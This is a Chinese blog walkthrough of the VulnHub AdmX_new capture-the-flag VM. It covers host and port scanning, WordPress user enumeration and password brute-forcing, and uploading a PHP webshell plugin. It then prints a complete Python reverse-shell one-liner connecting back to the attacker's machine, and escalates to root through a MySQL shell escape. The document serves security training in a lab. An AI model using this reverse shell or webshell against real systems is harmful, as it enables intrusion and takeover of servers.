AdmX_new靶场

最新推荐文章于 2024-07-29 14:22:26 发布
最新推荐文章于 2024-07-29 14:22:26 发布
阅读量169 收藏 1
点赞数
分类专栏: vulnhub靶场 文章标签: java 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjxxxy/article/details/131230807
版权

一、靶场介绍

1.下载地址:https://download.vulnhub.com/admx/AdmX_new.7z
2.将靶机网络适配器改为NAT模式
3.启动靶机

二、信息收集

1.主机发现

nmap -sn 192.168.111.1/24

在这里插入图片描述
2.端口扫描

nmap -A 192.168.111.136 -p 1-65535

在这里插入图片描述
3.目录扫描

feroxbuster --url http://192.168.111.136

这里图片忘记截了
在这里插入图片描述
4.网页访问
在这里插入图片描述

三、渗透流程

1.页面访问慢,查看请求都指向了192.168.159.145
在这里插入图片描述
2.利用BP,将地址进行替换,再重新访问
在这里插入图片描述
在这里插入图片描述
3.利用wpscan爆出用户名admin

wpscan --url http://10.0.2.7/wordpress --enumerate

在这里插入图片描述
4.利用BP爆破admin密码
在这里插入图片描述
在这里插入图片描述
5.在/wordpress/wp-admin使用admin/adam14进行登录
在这里插入图片描述
6.上传.zip木马文件
在这里插入图片描述
网页尝试访问

http://192.168.111.136/wordpress/wp-content/plugins/1.php?cmd=id

在这里插入图片描述
7.kali开启监听,网页执行shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.111.129",7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(["/bin/bash"])'

在这里插入图片描述
在这里插入图片描述
反弹成功
在这里插入图片描述
8.查看当前用户权限
在这里插入图片描述
9.尝试访问权限目录
在这里插入图片描述
10.获取root权限,提权成功

\! /bin/bash

在这里插入图片描述

zjxxxy
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
t6AdmX_new靶机
08-03
t6AdmX_new靶机
Windows ADMX/ADML
08-05
包括 Windows 8.1 及以上,Windows Server 2012 R2 及以上,所有 Windows 系统的 ADMX/ADML 模板文件,用于部署组策略管理模板。参考文档: https://mp.csdn.net/mp_blog/creation/editor/126182767。
Vulnhub--AdmX_new
weixin_45168704的博客
06-15 221
AdmX_new攻略
VulnHub-AdmX_new靶机渗透详解
大熊
06-16 216
BP自动替换、另类提权方法
AdmX_new靶机
weixin_45691672的博客
06-16 612
实验主机:AdmX_new靶机一台/Kali linux攻击机一台AdmX_new靶机 IP:192.168.3.9Kali linux攻击机 IP:192.168.3.32实验网络:桥接模式实验目标:获取靶机的Root权限。
AdmX_new靶机打靶过程及思路
qq_52610024的博客
04-11 2468
pty.spawn(“/bin/bash”)’利用数据库密码登录wpadmin发现失败,开始登录数据库,mysql-uadmin-pWp-Admin#123。sudo发现一个文件有sudo权限,使用命令输入最开始的密码,登录进的数据库拥有root权限,思考使用数据库提权,查看wp-config.php下的数据库账号密码,尝试密码复用的可能性,想到最开始的登录界面的管理员账号密码,拿过来尝试su发现成功,获取到第一个flag文件。9.仍然尝试在404页面插入一句话木马,用蚁剑连接获得新的shell,...
Admx_new靶机之BurpSuite内容替换、MSF漏洞利用、Wordpress后台漏洞利用、蚁剑上线、利用MySQL提权
qq_40898302的博客
05-12 543
1) Ctrl + Z 将shell放置后台 2) 输入 stty raw -echo 3) 输入 fg 将后台进程调用到前台 4) 关闭所有程序 5) 确定kali有bash ls /bin/bash 6) 将 zsh 改成 bsh sudo chsh -s /bin/bash 7) 重启 8) 输入 echo $SHELL 显示 /bin/bash 成功 9) 重新监听。有的系统漏洞只能触发一次,所以打点成功,基于这个shell获取更多的shell,利用多种方式,多种途径去获得更多的shell。
EvergreenAdmx:使Admx文件保持最新状态的脚本
05-27
长荣Admx 部署了多个Windows Virtual Desktop环境后,我决定不再希望手动下载所需的Admx文件,而是想要一种使它们保持最新状态的方法。 该脚本解决了两个问题。 检查存在的Admx文件的较新版本,并在找到新版本时进行...
Firefox ADMX-开源
07-01
Firefox ADMX 是一种允许通过 Active Directory 中的组策略和管理模板在 Firefox 中集中管理锁定和/或默认设置的方法。 Firefox ADMX 是 Mark Sammons 的 Firefox ADM 的延续。
horizon vdm_agent.admx代理组策略模板
12-05
【标题】"Horizon VDM-Agent.admx代理组策略模板"是Vmware云桌面解决方案中的一个重要组成部分,主要用于管理和配置Horizon View桌面虚拟机的行为。这个模板适用于Horizon 7.3.2及其以下版本,虽然它可能也兼容更高...
AdmX_new打靶记录
wwd180的博客
06-16 114
实验主机:攻击机kali(192.168.109.131)靶机AdmX_new(192.168.109.134)实验目标:获取root权限 + 2 flag实验网络:NAT。
AdmX_new靶机渗透过程
捣蛋鬼
04-02 4934
文章目录前言一、主机发现/端口扫描二、路径爆破/匹配替换三、密码爆破获得admin密码四、漏洞利用五、密码重用/MySQL提权总结 前言 靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z 难度:中(2个flag和root权限) kali:10.0.2.4 靶机:10.0.2.7 192.168.159.145
kali之vulnhub,Admx_new
weixin_54431413的博客
05-11 658
一、靶场环境部署 二、主机发现 三、端口扫描 四、服务版本扫描 五、登录开启的服务端口 六、进行目录扫描 七、暴力破解 八、利用wordpress后台 九、拿下wpadmin的shell
Admx_new
果粒程
11-22 384
Admx_new
Vulnhun_ADMX: 1.0.1
qq_45434762的博客
05-16 371
主机信息kali: 192.168.254.135 ADMX:: 192.168.254.159 信息收集通过nmap扫描目标主机发现只开放了80端口nmap -T4 -p- -A -v...
vulnhub靶场-AdmX
qq_42947816的博客
05-29 1327
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
java springboot 集成 阿里通义千问
qq_25987725的博客
07-25 393
一、在阿里云https://www.aliyun.com官网直接搜索“通义千问”,点击“开通DashScope”进行服务激活。四、在config目录添加配置 TongYiAiConfiguration.java。三、在yml中配置中配置key。二、加入Maven依赖。
使用hutool工具判断字符串是否全部是字母(包括大小写),java判断字符串是否全部是字母(包括大小写)
最新发布
qq_43700885的博客
07-29 444
1.导入hutool的maven依赖。2.复制一下代码执行。
java判断邮箱地址是否正确,使用hutool工具判断邮箱地址是否正确
qq_43700885的博客
07-29 243
1.导入hutool的maven依赖。2.直接复制一下代码运行。
apphvsi.admx
09-01
apphvsi.admx是一种用于管理应用虚拟化的Windows组策略模板文件。组策略是Windows操作系统中的一种集中管理和配置计算机和用户设置的工具。使用apphvsi.admx文件,管理员可以在组策略中定义和配置应用虚拟化相关的设置。 应用虚拟化是一种将应用程序从操作系统上物理安装到一个虚拟化容器中运行的技术。它可以使应用程序之间相互隔离,提高应用程序的兼容性和安全性。通过使用apphvsi.admx文件,管理员可以自定义虚拟化容器的设置,如文件访问权限、注册表访问权限、网络访问权限等。这样,管理员可以根据组织的需求和安全策略,精确控制应用程序的行为和访问权限。 通过组策略管理apphvsi.admx文件,管理员可以将相关的设置应用到特定的计算机或用户上。这样,管理员可以集中管理和配置应用虚拟化的设置,而不需要手动在每台计算机上进行配置。通过组策略,管理员可以快速、简便地将更改应用到整个组织中的计算机或用户。 总而言之,apphvsi.admx是一种管理应用虚拟化设置的Windows组策略模板文件,通过它可以实现对应用虚拟化的精确控制和集中管理。这对于组织来说,能够提高应用程序的兼容性、安全性,并简化管理工作。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值